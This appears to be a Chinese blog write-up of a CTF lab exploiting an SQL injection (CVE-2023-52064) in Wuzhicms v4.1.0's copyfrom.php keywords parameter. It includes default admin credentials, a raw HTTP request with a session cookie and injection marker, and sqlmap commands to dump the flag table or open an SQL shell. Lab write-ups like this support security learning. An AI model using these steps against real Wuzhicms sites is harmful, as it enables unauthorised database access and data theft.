【春秋云境】CVE-2023-52064 uzhicms v4.1.0 被发现存在一个 SQL 注入漏洞

最新推荐文章于 2024-05-16 10:07:32 发布
最新推荐文章于 2024-05-16 10:07:32 发布
阅读量411 收藏 4
点赞数 7
分类专栏: web安全 文章标签: sql web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HMX404/article/details/137379905
版权

靶场介绍

Wuzhicms v4.1.0 被发现存在一个 SQL 注入漏洞,该漏洞通过位于/core/admin/copyfrom.php$keywords 参数触发。

登录路径

用户名是admin
密码是 admin123
验证码点一下下面的刷新

咱就是脚本小子,抄就完了,有现成的poc多好用

靶场原因,加了一个www,多等一会儿就能登录了。
/www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms

数据包

登录后有cookie,抓包替换或者直接替换URL
URL: /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&_submenuid=&keywords=1

GET /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&_submenuid=&keywords=1* HTTP/1.1
Host: eci-2zefy6gjpark7avjqvo8.cloudeci1.ichunqiu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.2.1105117036.1705648933; _ga_J1DQF09WZC=GS1.2.1705648933.1.1.1705649285.0.0.0; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1712050349,1712106330,1712114403,1712226018; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1712226018; PHPSESSID=00e6edb34e0ddf4d7bb76ec5e4584e24; Jun_uid=c69f9xvMa6cghiVDV0FDDk6aL3KWLVkzlvbRrG3D; Jun_username=d56945sjVzGpntSFtL2J4X9AFh4x8W25X83xd4MtfZn5iA; Jun_wz_name=d751r0Z0zqqA8rIdysX%2BL2zsZHFjTBawEq%2BYn%2Fsxy%2FJsnw; Jun_siteid=0917PnFizP6GVj9A0iwK0VbSAYUfnghRaxjBaxly
Connection: close

sqlmap 跑起来

python sqlmap.py -r 1.txt -D wuzhicms -T flllaaaag -dump

直接出flag
或者 --sql-shell

select * from flllaaaag

在这里插入图片描述

HMX404
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
五指CMS copyfrom.php SQL注入漏洞复现(CVE-2023-52064)
0xSec
01-16 566
Wuzhicms 内容管理系统的/core/admin/copyfrom.php $keywords参数存在SQL注入漏洞,经过身份验证的攻击者可通过该漏洞获取数据库中的信息之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
春秋 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
春秋CVE-2023-51048 闪灵S-CMS v5.0 后台SQL注入漏洞
HMX404的博客
04-17 533
S-CMS v5.0 被发现存在SQLI。
春秋CVE-2023-52064
最新发布
qq274575499的博客
05-16 446
Wuzhicms v4.1.0 被发现存在一个 SQL 注入漏洞,该漏洞通过位于`/core/admin/copyfrom.php` 的 `$keywords` 参数触发。
春秋靶场CVE-2022-32991漏洞复现(sql手工注入)
zyh1588的博客
11-14 1206
小白复现CVE-2022-32991漏洞,该CMS的welcome.php中存在SQL注入攻击......
春秋镜:CVE-2022-25488(SQL报错注入
m0_65712192的博客
04-21 1041
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
春秋CVE-2023-50563 SEMCMS 后台SQL注入
HMX404的博客
04-17 373
SEMCMS v4.8版本存在SQLI,该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2023-28252 CLFS Windows 本地提权漏洞 POCC 源码
08-23
CVE-2023-28252 是一个存在于 clfs.sys(通用日志文件系统驱动程序)中的越界写入漏洞。 卡巴斯基披露该在野0day提权漏洞是一个越界写入(增量)漏洞,当目标系统试图扩展元数据块时被利用来获取system权限———...
春秋CVE-2023-52064
shr592833253的博客
04-08 707
在kali上执行命令 sqlmap -r xxx.txt --dbs --batch (xxx.txt为你所构造的POC)最后执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag -C flag --dump。再次执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag --columns。然后执行 sqlmap -r xxx.txt -D wuzhicms --tables。在尝试目录扫描后未发现有用的路径。
春秋CVE-2022-24124(Casdoor api get-oraganizations SQL注入
m0_65712192的博客
07-23 1028
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
春秋CVE-2023-39560 ECTouch v2 SQL注入
HMX404的博客
04-08 525
xpath语法错误extractvalue() --查询节点内容updatexml() --修改查询到的内容它们的第二个参数都要求是符合xpath语法的字符串如果不满足要求则会报错,并且将查询结果放在报错信息里–主键重复(duplicate entry)floor() --返回小于等于该值的最大整数只要是count,rand(),group by 三个连用就会造成这种主键重复报错。
春秋靶场CVE-2022-28512 sql手工注入
l181954187的博客
04-08 667
靶标介绍:Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。由于题目直接给出了路径和参数那便直接跳转,
【代码审计】五指CMS_v4.1.0 后台存在SQL注入漏洞分析
12-03 2475
  0x00 环准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhicms.com/download/ 测试网站首页:   0x01 代码分析 1、漏洞文件位置:/coreframe/app/promote/admin/index.php 第...
春秋CVE-2022-32991[漏洞复现]
如有错误感谢斧正
04-17 440
则我们的目标就在于寻找welcome.php地址以及相关的可注入eid参数。该漏洞是由于welcome.php中的eid参数包含了SQL注入漏洞。可以看到这里的URL地址就出现了welcome.php和eid参数。进入了home目录,这里有三个话题可以选择开启。先在页面正常注册、登录一个账号。拿到了四个数据库,继续选择ctf库进行爆表。随便选择一个进行开启点击Start即可。进入后查看网页URL。
春秋镜】CVE-2023-52064标靶Wp
KKleeeaa的博客
04-01 329
因为这个是WuZhiCMS,然后这里刚好我的博客里面介绍了有一个Day,不知道的小伙半,可以看看我的漏洞复现的文章,里面有个五指CMS的文章哦。这里抓包 把GET数据包 用SQLmap跑,这里注意下,GET数据包里,keyword=1* 其余删掉 后面的。然后直接上Day,有day就打day奥,打出来数据库为wuzhicms,不用我多说了吧直接flag展示奥。弱密码自己猜测奥,锻炼你自己,可以通过信息收集查询奥,小伙伴们加油!输入来篡改SQL语句的结构,执行恶意的SQL命令。这里直接弱密码,尝试进去后台。
春秋CVE-2022-29464
09-05
春秋CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值